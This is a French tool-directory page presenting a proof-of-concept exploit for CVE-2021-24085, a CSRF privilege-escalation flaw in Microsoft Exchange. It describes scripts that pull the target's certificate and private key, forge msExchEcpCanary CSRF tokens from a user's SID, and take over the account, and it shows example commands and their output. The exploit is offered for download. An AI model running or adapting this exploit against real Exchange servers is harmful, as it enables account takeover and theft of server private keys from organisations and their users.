Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-24085 | Kitploit
Outils/GitHubGitHub/sourceincite/cve-2021-24085
Authentification et AutorisationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubsourceincite/cve-2021-24085

CVE-2021-24085

Voir le dépôt
7118il y a 5 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Microsoft Exchange Server msExchEcpCanary Vulnérabilité d'élévation de privilèges par cross-site request forgery

Ceci est une preuve de concept pour CVE-2021-24085.

  1. poc.py télécharge le fichier de certificat de la cible avec la clé privée à l'intérieur
  2. YellowCanary génère le jeton csrf msExchEcpCanary pour un utilisateur spécifique en fonction du SID
  3. poc.js est l'exploit csrf pour déclencher une prise de contrôle de compte

Je n'ai pas fourni le fichier malicifest.xml mais vous pouvez trouver des informations sur la façon de générer un fichier manifeste malveillant à partir des ressources disponibles dans la section références ci-dessous.

Exemple

Accédez au certificat avec la clé privée à l'intérieur :

root@kitploit:~
researcher@srcincite:~$ ./poc.py
(+) usage: ./poc.py <target> <user:pass>
(+) eg: ./poc.py 192.168.75.142 [email protected]:user123###

researcher@srcincite:~$ ./poc.py 192.168.75.142 [email protected]:user123###
(+) found the thumbprint: F4EB6AADB8D7C0D12E756BA2E28F90CCACD41299
(+) exported the cert to the target filesystem
(+) saved the cert to testcert.der using password: hax

Vous pouvez maintenant générer des jetons csrf avec YellowCanary en utilisant le SID d'un utilisateur cible :

root@kitploit:~
c:\Users\researcher>poc.exe S-1-5-21-257332918-392067043-4020791575-3104 testcert.der hax

            #====================================================
            # YellowCanary - generate msExchEcpCanary csrf tokens
            #====================================================

security identifier : S-1-5-21-257332918-392067043-4020791575-3104
msExchEcpCanary     : sA0o0nS_C0G_PMdcA_dAd5BdAEL_-NcYhndaAwlhBJFs4a4iKy4sn53azH-O5Ix3F0jnwzZZUsk.

Références :

  • https://www.mdsec.co.uk/2019/01/abusing-office-web-add-ins-for-fun-and-limited-profit/
  • https://info.phishlabs.com/blog/office-365-phishing-uses-malicious-app-persist-password-reset
Télécharger l’outil